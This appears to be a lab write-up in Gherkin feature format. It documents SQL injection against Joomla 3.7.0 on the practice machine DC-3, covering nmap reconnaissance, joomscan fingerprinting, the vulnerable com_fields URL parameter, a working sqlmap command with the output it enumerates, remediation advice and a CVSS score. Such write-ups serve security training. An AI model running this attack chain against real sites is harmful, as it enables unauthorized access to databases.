## Version 1.4.1
## language: en

Feature:
  TOE:
    DC-3
  Category:
    SQL Injection
  Location:
    http://192.168.1.50/index.php?option=com_fields&view=fields&layout=
    modal&list[fullordering]=updatexml
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject SQL to get access to unathorized data
  Recommendation:
    Sanitize inputs to avoid SQL statements

  Background:
  Machine information:
    | <Software name>   |  <Version> |
    | Virtualbox        |     6.1    |
    | Arch Linux        |     5.7    |
  Hacker Software:
    | Chromium          |    84.0    |
    | Nmap              |     7.8    |
    | Joomscan          |   0.0.7    |
    | Sqlmap            |   1.4.8    |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 00:18 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.00074s latency).
    Nmap scan report for 192.168.1.51
    Host is up (0.092s latency).
    Nmap scan report for 192.168.1.52
    Host is up (0.00028s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.035s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.069s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.0093s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.033s latency).
    Nmap done: 256 IP addresses (7 hosts up) scanned in 8.68 seconds
    """
    And I determined that the ip of the machine is 192.168.1.50
    And and it has the port 80 (http by default) open
    Then then I could say that it is a web application
    """
    $ nmap 192.168.1.50
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 00:19 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.00015s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE
    80/tcp open  http

    Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
    """

  Scenario: Normal use case
    Given I access http://192.168.1.50/
    And I see a login form
    And and if the credentials are wrong I get [evidence](error.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can not do a static detection

  Scenario: Dynamic detection
    Given im in the website the first thing I did was to check the html code
    Then I saw something interesting
    And it is that the web its CMS is Joomla
    """
    <!DOCTYPE html>
    <html lang="en-gb" dir="ltr">
    <head>
      <meta name="viewrt" content="width=device-width, initial-scale=1.0"/>
      <meta charset="utf-8" />
      <base href="http://192.168.1.50/" />
      <meta name="descriion" content="A website for DC-3" />
      <meta name="generor" content="Joomla! - Open Source Content Mana.."/>
      <title>Home</title>
      <style>

      h1, h2, h3, h4, h5, h6, .site-title {
        font-family: 'Open Sans', sans-serif;
      }
    """
    Then when I thought it might be using an outdated version
    And that contains some vulnerability
    Then to analyze it, I used the joomscan tool
    """
    $ perl joomscan.pl -u http://192.168.1.50/


     (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
    .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
    \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
        (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

    Processing http://192.168.1.50/ ...



    [+] FireWall Detector
    [++] Firewall not detected

    [+] Detecting Joomla Version
    [++] Joomla 3.7.0

    [+] Core Joomla Vulnerability
    [++] Target Joomla core is not vulnerable

    [+] Checking Directory Listing
    [++] directory has directory listing :
    http://192.168.1.50/administrator/components
    http://192.168.1.50/administrator/modules
    http://192.168.1.50/administrator/templates
    http://192.168.1.50/images/banners


    [+] Checking apache info/status files
    [++] Readable info/status files are not found

    [+] admin finder
    [++] Admin page : http://192.168.1.50/administrator/

    [+] Checking robots.txt existing
    [++] robots.txt is not found

    [+] Finding common backup files name
    [++] Backup files are not found

    [+] Finding common log files name
    [++] error log is not found

    [+] Checking sensitive config.php.x file
    [++] Readable config files are not found

    Your Report : reports/192.168.1.50/
    """
    Then when I saw that its version is 3.7.0
    And according to joomscan it does not seem vulnerable
    Then I didn't trust it
    And  I googled: "joomla 3.7.0 exploit"
    And for my luck i found a exploit in exploit-db
    """
    https://www.exploit-db.com/exploits/42033
    """
    Then it is a SQL injection in the url
    """
    www.targe.com/index.php?option=com_fields&view=fields&layout=modal&
    list[fullordering]=updatexml[sqli here]
    """
    Then I directly proceeded to check in the site [evidence](sqli.png)
    And indeed it seems to be vulnerable

  Scenario: Exploitation
    Given the application is vulnerable to SQL injection
    Then I proceeded to exploit the vulnerability with sqlmap
    """
    $ python sqlmap.py -u -u "http://192.168.1.50/index.php\?option\=
    com_fields\&view\=fields\&layout\=modal\&list\[fullordering\]\=updatexml"
    --risk=3 --level=5 --random-agent --dbs -p "list[fullordering]"

    ...
    [20:09:03] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial
    web application technology: Apache 2.4.18
    back-end DBMS: MySQL >= 5.1
    [20:09:03] [INFO] fetching database names
    [20:09:04] [INFO] used SQL query returns 5 entries
    [20:09:04] [INFO] retrieved: 'information_schema'
    [20:09:04] [INFO] retrieved: 'joomladb'
    [20:09:04] [INFO] retrieved: 'mysql'
    [20:09:05] [INFO] retrieved: 'performance_schema'
    [20:09:05] [INFO] retrieved: 'sys'
    available databases [5]:
    [*] information_schema
    [*] joomladb
    [*] mysql
    [*] performance_schema
    [*] sys
    """

  Scenario: Remediation
    Update Joomla to the latest version provided by the vendor

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environment
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    None
